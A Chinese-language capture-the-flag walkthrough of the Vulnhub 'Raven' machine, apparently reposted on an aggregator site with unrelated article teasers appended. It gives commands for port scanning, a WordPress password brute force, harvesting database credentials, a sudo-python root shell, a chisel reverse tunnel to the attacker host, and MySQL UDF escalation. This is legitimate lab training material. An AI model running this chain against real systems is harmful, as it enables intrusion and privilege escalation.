[Vulnhub] Raven WordPress+SUDO-Python权限提升+MSQP自动化Mysql权限提升

信息收集

IP AddressOpening Ports
192.168.101.159TCP:

$ nmap -p- 192.168.101.159 --min-rate 1000 -sC -sV 

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
|   1024 26:81:c1:f3:5e:01:ef:93:49:3d:91:1e:ae:8b:3c:fc (DSA)
|   2048 31:58:01:19:4d:a2:80:a6:b9:0d:40:98:1c:97:aa:53 (RSA)
|   256 1f:77:31:19:de:b0:e1:6d:ca:77:07:76:84:d3:a9:a0 (ECDSA)
|_  256 0e:85:71:a8:a2:c3:08:69:9c:91:c0:3f:84:18:df:ae (ED25519)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-title: Raven Security
|_http-server-header: Apache/2.4.10 (Debian)
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          37755/udp6  status
|   100024  1          46017/tcp6  status
|   100024  1          52049/udp   status
|_  100024  1          60004/tcp   status
60004/tcp open  status  1 (RPC #100024)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

本地权限

http://192.168.101.159/

image.png

$ dirb http://192.168.101.159

image-1.png

image-2.png

# echo '192.168.101.159 raven.local'>>/etc/hosts

image-3.png

$ wpscan --url http://raven.local/wordpress --enumerate u

usernames:michael,steven

image-4.png

$ wpscan --url http://raven.local/wordpress --usernames michael,steven --passwords /usr/share/wordlists/rockyou.txt

image-5.png

Username: steven, Password: pink84

$ ssh steven@192.168.101.159

image-6.png

Flag 1

$ cat /var/www/html/service.html

image-11.png

flag1{b9bbcb33e11b80be759c4e844862482d}

Flag 2

$ cat /var/www/flag2.txt

image-9.png

flag2{fc3fd58dcdad9ab23faca6e9a36e581c}

Flag 3

$ cat /var/www/html/wordpress/wp-config.php

image-12.png

username:root
password:R@v3nSecurity

$ mysql -uroot -p
mysql> use wordpress
mysql> select * from wp_posts\G;

image-13.png

flag3{afc01ab56b50591e7dccf93122770cd2}

权限提升

SUDO

$ sudo -l

image-7.png

$ sudo /usr/bin/python -c 'import pty;pty.spawn("/bin/bash")'

image-8.png

MYSQL:UDF:MSQP

利用MSQP检测权限提升

$ git clone https://github.com/MartinxMax/MSQP.git

$ python3 -m pip install mysql-connector-python

$ cd MSQP

首先kali开放服务端:

$ ./chisel server -p 8000 --reverse

image-14.png

启动客户端:

(target)$ ./chisel client 192.168.101.128:8000 R:localhost:3306

image-15.png

$ python3 msqp.py 127.0.0.1 3306 root R@v3nSecurity 192.168.101.128 100

image-16.png

Flag4

root@Raven:~# cat /root/flag4.txt

image-10.png

flag4{715dea6c055b9fe3337544932f2941ce}

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.xdnf.cn/news/1488450.html

如若内容造成侵权/违法违规/事实不符,请联系一条长河网进行投诉反馈,一经查实,立即删除!

相关文章

UDP/TCP协议解析

UDP/TCP协议解析

我最近开了几个专栏,诚信互三! > |||《算法专栏》::刷题教程来自网站《代码随想录》。||| > |||《C专栏》::记录我学习C的经历,看完你一定会有收获。||| > |||《Linux专栏》&#xff1…
阅读更多...
android settings提示音开关状态与修改(二)

android settings提示音开关状态与修改(二)

android系统,settings提示音类型: 充电提示音开关,文件路径: packages/apps/Settings/src/com/android/settings/notification/ChargingSoundPreferenceController.java 创建并设置开关状态: public ChargingSoundPre…
阅读更多...
git sendemail使用

git sendemail使用

教程参考: git-send-email - 以电子邮件形式发送补丁集 1、安装git-email 2、配置 SMTP 服务器 git config --global sendemail.smtpserver smtp.163.com git config --global sendemail.smtpserverport 465 git config --global sendemail.smtpuser xxxxxx163.c…
阅读更多...
设计模式笔记(一)

设计模式笔记(一)

目录 设计模式共有23种,也可称为GOF23 单例模式(重点,常用) 工厂模式 代理模式:(SpringAOP的底层原理) 静态代理模式:(写死一个代理类Proxy) 动态代理模…
阅读更多...
ansible基础讲解和加密文件讲解

ansible基础讲解和加密文件讲解

ansible最重要的三个文件 /etc/ansible/ansible.cfg #####ansible的配置文件 /etc/ansible/host ##清单文件inventory ansible-navigator.yml ####以yml结尾的文件可以理解为conf结尾的文件,是配置文件,用于设置剧本playbook playbook讲解 以.yml结…
阅读更多...
Superset二次开发之筛选器native Filters 水平布局

Superset二次开发之筛选器native Filters 水平布局

引言 Apache Superset作为一个功能强大的开源数据探索和可视化平台,提供了丰富的配置选项来定制化用户体验。其中,HORIZONTAL_FILTER_BAR 是一个重要的配置项,专注于优化和改进Superset中的筛选器条布局与交互。 什么是HORIZONTAL_FILTER_B…
阅读更多...
IEC104转MQTT网关支持MQTT对接Ignition、阿里云、华为云、亚马逊AWS、ThingsBoard、Zabbix平台助力远程管理

IEC104转MQTT网关支持MQTT对接Ignition、阿里云、华为云、亚马逊AWS、ThingsBoard、Zabbix平台助力远程管理

钡铼推出了一款专为电力系统设计的数据采集网关——IEC104转MQTT网关BE113,感兴趣的朋友接着往下看: 一、网关概述 IEC104转MQTT(Ignition)网关BE113是一款专为电力系统设计的数据采集网关,支持DL/T645和IEC104等协议的设备。上行支持MQTT协…
阅读更多...
LLama 405B 技术报告解读

LLama 405B 技术报告解读

LLama 405B 技术报告解读 果然传的消息都是真的,meta在24号凌晨发布了llama 3的405B版本,这次还是做一个技术报告解读。 值得一提的是,在技术报告的开头,meta特意强调了一个 Managing complexity,大意是管控复杂度。…
阅读更多...
OAK-FFC 分体式相机使用入门介绍

OAK-FFC 分体式相机使用入门介绍

概述 OAK FFC 主控板和多种可选配镜头模组非常适合灵活的搭建您的3D人工智能产品原型。由于镜头是分体式的,因此你可以根据需要测量的距离,自定义深度相机安装基线,并根据你的项目要求(分辨率、快门类型、FPS、光学元件&#xff…
阅读更多...
巴黎奥运启幕 PLM系统助力中国制造闪耀全球

巴黎奥运启幕 PLM系统助力中国制造闪耀全球

2024巴黎奥运会将于法国当地时间7月26日在塞纳河畔正式开幕。即将亮相巴黎奥运会赛场的除了中国运动员之外,还有一批批中国制造企业为奥运会设计并制造的体育设备也将惊艳亮相,成为赛场上另一道亮丽的风景线。 在新时代的浪潮中,中国制造业坚…
阅读更多...
提交高通量测序处理数据到 GEO --- 操作流程

提交高通量测序处理数据到 GEO --- 操作流程

❝ 写在前面 由于最近在提交课题数据到 NCBI 数据库,整理了相关笔记。本着自己学习、分享他人的态度,分享学习笔记,希望能对大家有所帮助。推荐先按顺序阅读往期内容: 1. 提交高通量测序数据到 GEO --- 说明书 2. 提交高通量测序原…
阅读更多...
tcache attack

tcache attack

Tcache Attack tcache让堆利用更加简单: tcache回顾: 在 tcache 中新增了两个结构体,分别是 tcache_entry 和 tcache_perthread_struct: /* We overlay this structure on the user-data portion of a chunk when the chunk is …
阅读更多...
如何安全的申请SSL证书

如何安全的申请SSL证书

随着数字化时代的快速发展,互联网政务应用已成为政府服务民众、提升治理效能的重要途径。在这个网络日益复杂的时代,政务网站的安全问题显得尤为重要。2024年,国家出台并从2024年7月1日开始实施执行《互联网政务应用安全管理规定》&#xff0…
阅读更多...
使用 XRDP 远程linux主机

使用 XRDP 远程linux主机

一、简介 XRDP是一个开源的远程桌面协议(Remote Desktop Protocol,RDP)服务器,采用的是标准的RDP。 官网地址:https://www.xrdp.org/ github地址: https://github.com/neutrinolabs/xrdp/releases XRDP也是C/S架构&…
阅读更多...
LLM及GPT知识点

LLM及GPT知识点

工欲善其事必先利其器,在了解大语言模型和GPT之前先要了解基本概念。 LLM Large Language Model (LLM) 即大型语言模型,也叫大语言模型,是一种基于深度学习的自然语言处理(NLP)模型,它能够学习自然语言的语…
阅读更多...
汇昌联信科技拼多多怎么样?

汇昌联信科技拼多多怎么样?

汇昌联信科技拼多多怎么样?汇昌联信科技是一家专注于提供电子商务解决方案的公司,其业务涉及多个电商平台,其中就包括了国内知名的电商平台——拼多多。对于汇昌联信科技在拼多多上的表现,我们可以从以下几个方面来进行深入的探讨和分析。 一…
阅读更多...
网站用HTTP访问的危害以及如何升级HTTPS访问

网站用HTTP访问的危害以及如何升级HTTPS访问

在互联网世界中,数据传输的安全性是至关重要的。我们每天都在网络上进行各种操作,从浏览网页、购物到银行转账,每一项活动都涉及敏感信息的传递。然而,在这个过程中,我们的数据可能面临被窃取、篡改或滥用的风险。这正…
阅读更多...
git实践汇总【配置+日常使用+问题解决】

git实践汇总【配置+日常使用+问题解决】

**最初配置步骤:** git config --global user.name "yournemae" git config --global user.email "yourmail" git config -l ssh-keygen -t rsa -C “xxx.xxxx.EXTcccc.com” git config --global ssh.variant ssh $ git clone git仓库路径 git…
阅读更多...
掌握AJAX技术:从基础到实战

掌握AJAX技术:从基础到实战

文章目录 **引言****1. 什么是AJAX?****2. AJAX的工作原理**AJAX 示例使用 Fetch API 实现 AJAX **3. 如何在项目中使用AJAX****4. 处理AJAX请求的常见问题****5. AJAX与JSON的结合****6. 使用AJAX框架和库****7. 实战:创建一个动态表单****8. AJAX中的事…
阅读更多...
PostgreSQL性能优化之体系结构

PostgreSQL性能优化之体系结构

本文介绍 PostgreSQL 数据库的体系结构,包括实例结构(进程与内存)、存储结构(物理与逻辑)以及插件式存储引擎。 实例与数据库聚簇 PostgreSQL 使用典型的客户端/服务器(Client/Server)架构&am…
阅读更多...
最新文章

Copyright @ 2022~2023